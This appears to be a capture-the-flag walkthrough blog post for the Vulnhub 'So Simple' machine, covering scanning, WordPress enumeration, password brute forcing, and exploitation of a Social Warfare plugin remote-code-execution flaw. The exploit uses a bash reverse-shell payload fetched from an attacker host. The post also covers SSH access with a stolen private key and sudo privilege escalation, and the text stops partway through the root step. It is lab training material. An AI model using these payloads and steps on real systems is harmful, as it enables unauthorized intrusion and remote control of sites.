So Simple is Easy/Beginners level CTF machine available on Vulnhub create by @roelvb79. There are three flags (2 user and 1 root flag). Which you can download from here.
#nmap
$nmap -p- 192.168.1.3 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-17 03:14 EDT Nmap scan report for so-simple.domain.name (192.168.1.3) Host is up (0.0027s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
As got port 80 is open start dir fuzzing, use dirb or any other tool.
#dirb
#dirb http://192.168.1.3/ DIRB v2.22 By The Dark Raver START_TIME: Mon Aug 17 03:23:43 2020 URL_BASE: http://192.168.1.3/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.1.3/ ---- http://192.168.1.3/index.html (CODE:200|SIZE:495) http://192.168.1.3/server-status (CODE:403|SIZE:276) ==> DIRECTORY: http://192.168.1.3/wordpress/
Use Wpscan or CMSeek to enumerate wordpress, this time I like to go with CMSeek. CMSeek is written in python help for various CMS testing. You can download it from github https://github.com/Tuhinshubhra/CMSeeK
#cmseek
$python3 cmseek.py -u http://192.168.X.X/wordpress/ [+] Deep Scan Results [+] ┏━Target: 192.168.1.3 ┠── CMS: WordPress ┃ ├── Version: 5.4.2 ┃ ╰── URL: https://wordpress.org ┠──[WordPress Deepscan] ┃ ├── Readme file found: http://192.168.1.3/wordpress//readme.html ┃ ├── License file: http://192.168.1.3/wordpress//license.txt ┃ ├── Plugins Enumerated: 2 ┃ │ ├── Plugin: social-warfare ┃ │ │ ├── Version: 3.5.0 ┃ │ │ ╰── URL: http://192.168.1.3/wordpress//wp-content/plugins/social-warfare ┃ │ ╰── Plugin: simple-cart-solution ┃ │ ├── Version: 5.4.2 ┃ │ ╰── URL: http://192.168.1.3/wordpress//wp-content/plugins/simple-cart-solution ┃ ├── Themes Enumerated: 1 ┃ │ ╰── Theme: twentynineteen ┃ │ ├── Version: 1.6 ┃ │ ╰── URL: http://192.168.1.3/wordpress//wp-content/themes/twentynineteen ┃ ├── Usernames harvested: 2 ┃ │ ├── admin ┃ │ ╰── max
now let’s try to bruteforce using wpscan with rockyou.txt worslist. user.txt contain username max,admin and for password use rockyou.txt
$wpscan --url http://192.168.1.3/wordpress/ -U user.txt -P rockyou.txt [+] Performing password attack on Wp Login against 1 user/s Trying max / opensesame Time: 00:06:57 <=========================================================> (5960 / 5960) 100.00% Time: 00:06:57 [SUCCESS] - max / opensesame [!] Valid Combinations Found: | Username: max, Password: opensesame
#exploitation
Check social-wardare plugin and got https://wpvulndb.com/vulnerabilities/9259 which is unautheticated RCE
Create shell.txt file which include line given below and host it on local machine. Example in case of kali start python http server using command python -m SimpleHTTPServer
<pre> system("bash -c 'bash -i >& /dev/tcp/192.168.1.6/4444 0>&1'")</pre>
and now simply visit http://192.168.1.3/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.1.6:8000/shell.txt
and got shell via nc -lvp 4444
Check for max user folder and got id_rsa file in .ssh directory
copy it, create file id_rsa and change permission, login via ssh. got first user flag.
chmod 600 id_rsa ssh -i id_rsa [email protected]
#privileges escalation
for steven user
sudo -l sudo -u steven /usr/sbin/service ../../bin/bash
now let’s try for root, tried sudo -l and seems that particular bash file have privileges but not present so let’s create it.
